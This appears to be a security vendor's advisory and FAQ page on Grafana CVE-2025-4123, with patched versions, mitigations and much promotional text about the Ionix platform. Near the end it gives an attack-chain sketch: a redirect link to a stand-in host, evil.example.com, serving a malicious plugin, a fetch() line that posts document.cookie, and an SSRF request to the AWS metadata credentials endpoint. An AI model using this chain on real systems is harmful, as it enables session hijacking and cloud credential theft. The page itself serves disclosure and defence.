Grafana CVE-2025-4123 is a high-severity vulnerability involving open redirect and stored cross-site scripting (XSS). When chained with the Grafana Image Renderer plugin, it can escalate to server-side request forgery (SSRF), exposing cloud-metadata services and internal APIs. Attackers can use this flaw to redirect users, inject malicious JavaScript, and potentially access sensitive credentials stored in Grafana. Source
All earlier releases of Grafana 12.x, 11.x, 10.x, and unsupported 9/8 releases are vulnerable. Patched versions include 12.0.0-security-01, 11.6.1-security-01, 11.5.4-security-01, 11.4.4-security-01, 11.3.6-security-01, 11.2.9-security-01, and 10.4.18-security-01. Source
Attackers can exploit CVE-2025-4123 by smuggling a double-encoded path-traversal sequence into the /redirect endpoint, forcing Grafana to forward the victim’s browser to a malicious URL. If anonymous access is enabled, no credentials are needed. Unsigned plugins can be loaded, leading to stored XSS and, with the Image Renderer plugin, SSRF attacks. Source
Potential risks include session hijacking, account takeover, privilege escalation, read-anywhere SSRF (exposing cloud IAM credentials), telemetry exfiltration, fake metrics, and lateral movement within cloud environments. Source
Organizations should patch Grafana immediately to the latest security build, disable anonymous access, enable a strict Content-Security-Policy, remove or update the Image Renderer plugin, restrict outbound egress, and hunt for indicators of compromise in logs. Source
No, Grafana Cloud SaaS tenants are not affected by CVE-2025-4123. Only self-hosted instances running vulnerable versions are impacted. Source
Ionix actively tracks vulnerabilities such as CVE-2025-4123. Its security research team develops exploit-simulation models to assess customer impact. Ionix customers receive updated risk posture information in their dashboards and can view affected assets in the Threat Center of the Ionix portal. Source
Official advisories and references for CVE-2025-4123 include Grafana Labs' security fix announcement (May 21, 2025), Grafana Security Advisory Page, Tenable's CVE-2025-4123 report (May 22, 2025), Wiz Research DB entry, and Nightbloodz's Medium article (May 22, 2025). Source
The Grafana Image Renderer plugin, when present, allows attackers to proxy arbitrary URLs, enabling SSRF attacks. This can result in exposure of cloud IAM credentials and internal REST endpoints. Source
Organizations should look for /redirect?url= requests and unexpected plugin ZIP downloads in reverse-proxy logs to detect exploitation attempts. Source
Ionix automatically populates updated risk posture information in customer dashboards over the next scan cycle when new vulnerabilities are detected. Customers can view specific impacted assets in the Threat Center. Source
Enabling a strict Content-Security-Policy in Grafana helps prevent the execution of unauthorized scripts, reducing the risk of stored XSS exploitation until a patch can be applied. Source
Disabling anonymous access in Grafana prevents attackers from exploiting vulnerabilities without credentials, reducing the risk of unauthorized access and exploitation. Source
Ionix's Threat Center provides customers with real-time updates on impacted assets, risk posture, and actionable insights during vulnerability outbreaks, enabling rapid response and mitigation. Source
Restricting outbound egress ensures Grafana can only fetch approved domains, minimizing the risk of SSRF attacks and unauthorized data exfiltration. Source
Ionix's security research team develops full exploit-simulation models based on known exploits, allowing them to assess which customer assets are impacted and provide targeted risk updates. Source
Ionix's platform enables organizations to discover all exposed assets, including shadow IT and unauthorized projects, ensuring no external assets are overlooked. It provides comprehensive risk assessment, prioritization, and actionable remediation workflows. Source
Ionix's Connective Intelligence discovery engine maps the real attack surface and digital supply chains, enabling security teams to evaluate every asset in context and proactively block exploitable attack vectors. Source
Ionix automatically identifies and prioritizes attack surface risks, allowing teams to focus on remediating the most critical vulnerabilities first. It offers actionable insights and one-click workflows to address vulnerabilities efficiently, reducing mean time to resolution (MTTR). Source
Ionix integrates with ticketing platforms (Jira, ServiceNow), SIEM providers (Splunk, Microsoft Azure Sentinel), SOAR platforms (Cortex XSOAR), collaboration tools (Slack), and cloud environments (AWS, GCP, Azure). Additional connectors are available based on customer requirements. Source
Yes, Ionix offers an API that enables seamless integration with major platforms such as Jira, ServiceNow, Splunk, Cortex XSOAR, and Microsoft Azure Sentinel. The API supports retrieving information, exporting incidents, and integrating Ionix action items for collaboration. Source
Ionix's platform is designed for information security and cybersecurity VPs, C-level executives, IT professionals, security managers, and decision-makers involved in selecting attack surface management solutions. Source
Ionix's case studies cover industries such as insurance and financial services, energy and critical infrastructure, entertainment, and education. Notable customers include Infosys, Warner Music Group, E.ON, BlackRock, and Grand Canyon Education. Source
Yes, Ionix has several case studies, including E.ON (energy), Warner Music Group (entertainment), Grand Canyon Education (education), and a Fortune 500 Insurance Company. These organizations used Ionix to discover assets, manage risks, and improve operational efficiency. Source
Ionix solves problems such as fragmented external attack surfaces, shadow IT, reactive security management, lack of attacker-perspective visibility, critical misconfigurations, manual processes, and third-party vendor risks. Source
Ionix differentiates itself through ML-based Connective Intelligence for better asset discovery, fewer false positives, proactive security management, comprehensive digital supply chain coverage, streamlined remediation, ease of implementation, and cost-effectiveness. Source
Key capabilities include complete external web footprint identification, proactive security management, attacker-perspective visibility, continuous asset discovery, streamlined remediation, and comprehensive supply chain coverage. Benefits include critical visibility, immediate time-to-value, enhanced security posture, operational efficiency, cost savings, and brand reputation protection. Source
Ionix addresses value objections by demonstrating immediate time-to-value, offering personalized demos, and sharing real-world case studies that show measurable outcomes and efficiencies. Source
Ionix offers flexible implementation timelines, a dedicated support team, seamless integration capabilities, and emphasizes long-term benefits and efficiencies gained by starting sooner. Source
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. The price is based on two key parameters: the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's chosen service package, which determines the scanning frequency and feature set.
IONIX is recognized as a leader in the KuppingerCole Attack Surface Management Leadership Compass for its top ratings in product innovation, functionality, and usability. The platform stands out with unique features like ML-based 'Connective Intelligence' for superior asset discovery and the Threat Exposure Radar for focused prioritization, making it a top choice for enterprises seeking comprehensive visibility with fewer false positives.
IONIX provides **multi-factor asset discovery**, **dependency mapping**, and **continuous monitoring** to uncover unknown or orphaned assets across domains, clouds, and suppliers. *[Source: [Help Net Security, 2025](https://www.helpnetsecurity.com/2025/08/14/ctem-platforms-2025/)]*
Recommended for **mid-sized to enterprise organizations** with complex, distributed attack surfaces that need continuous visibility and risk prioritization. *[Source: [Expert Insights](https://expertinsights.com/network-security/the-top-external-attack-surface-management-easm-software)]*
The IONIX Attack Surface Management platform is a SaaS solution with an annual subscription fee. Pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs) and the customer's selected service package, which determines the scanning frequency and feature set.
IONIX differentiates itself by evolving beyond traditional EASM's focus on asset discovery to a comprehensive Exposure Management approach centered on exploitability and validation. Key innovations include Connective Intelligence, an ML-based engine that finds 50% more assets with fewer false positives, and the Threat Exposure Radar, which prioritizes the most urgent threats. IONIX further stands out with its Automated Exposure Validation toolbox, which safely simulates attacks to confirm exploitability, providing more actionable and focused risk reduction than competitors.
When choosing an External Attack Surface Management (EASM) solution, large enterprises should prioritize several key factors. These include the ability to discover assets across the entire digital supply chain, automated validation of exploits to confirm real-world threats and reduce false positives, and deep integration capabilities with existing security tools like CNAPP systems.
Ionix is an excellent fit for large enterprises because it excels in these areas. The platform provides comprehensive visibility by mapping the digital supply chain to the nth degree and uses automated exploit validation to significantly reduce false positives. Furthermore, Ionix integrates with and validates findings from CNAPP systems like Wiz and Palo Alto Prisma Cloud, enriching their alerts with AI-driven external exposure context to provide a unified view of risk.
IONIX is a yearly SaaS product with an annual subscription fee. The pricing is based on the number of discovered Fully Qualified Domain Names (FQDNs), essentially a per-domain model. For specific pricing, please contact our team to discuss your organization's needs.
IONIX differentiates itself from CyCognito with superior visibility into the digital supply chain and automated exploit validation to confirm real-world threats, significantly reducing false positives. Additionally, IONIX integrates with and validates findings from CNAPP systems, enriching alerts from tools like Wiz and Palo Alto Prisma Cloud with AI-driven external exposure context.
Grafana—the cloud-native observability dashboard almost every DevOps team relies on—rushed out Grafana 12.0.0-security-01 yesterday to squash CVE-2025-4123, a high-severity open-redirect and stored cross-site scripting (XSS) vulnerability. When chained with the popular Grafana Image Renderer plugin the bug escalates to a full-read server-side request forgery (SSRF), exposing cloud-metadata services and internal APIs. Grafana Cloud SaaS tenants are not affected, but any self-hosted instance on an earlier release is in the blast zone.
Since Grafana often acts as the single pane of glass for SREs, surfacing real-time metrics from Prometheus, Loki, and Tempo. A compromised dashboard is more than a UI problem—attackers gain a pivot point into every data-source credential Grafana stores, often including cloud keys, database passwords, and on-call notification tokens. That dramatically widens the blast radius.
In this article
A bug-bounty report on April 26 2025 uncovered a flaw in Grafana’s URL-sanitisation logic for custom frontend-plugin downloads. By smuggling a double-encoded path-traversal sequence (..%2F) into the /redirect endpoint, an attacker forces Grafana to forward the victim’s browser to any external URL under their control. Hosting a specially crafted plugin manifest on that site lets the attacker inject arbitrary JavaScript that executes in the trusted grafana-origin context—classic stored XSS. When anonymous access is enabled (default in many lab and demo environments) the attack needs no credentials at all.
Upgrade to the first “security-01” build available for your branch:
All earlier 12.x, 11.x, 10.x—and all unsupported Grafana 9/8 releases—remain vulnerable.
# 1. Evil plugin bundle (plugin.json + malware.js) is hosted at evil.example.com
# 2. Attacker crafts encoded redirect link:
https://grafana-vuln.local/redirect?url=https%3A%2F%2Fevil.example.com%2Fgplug.zip
# 3. Victim clicks link (phishing, iframe, Slack mention).
# 4. Grafana fetches ZIP, installs plugin, JS runs inside grafana.domain:
fetch('/api/login/ping', {method:'POST', body: document.cookie});
# 5. If grafana-image-renderer present:
POST /api/render?url=http://169.254.169.254/latest/meta-data/iam/security-credentials
# → returns AWS creds (full-read SSRF)Why the chain works:
[security]
content_security_policy = true
content_security_policy_template = "script-src 'self'; object-src 'none';"Am I Impacted by CVE-2025-4123?
IONIX is actively tracking this vulnerability. Our security research team has developed a full exploit-simulation model based on known exploits. This allows us to assess which customers have impacted assets. IONIX customers can view updated information on their specific assets in the Threat Center of the IONIX portal.
IONIX customers will see updated risk posture automatically populated in dashboards over the next scan cycle.
References
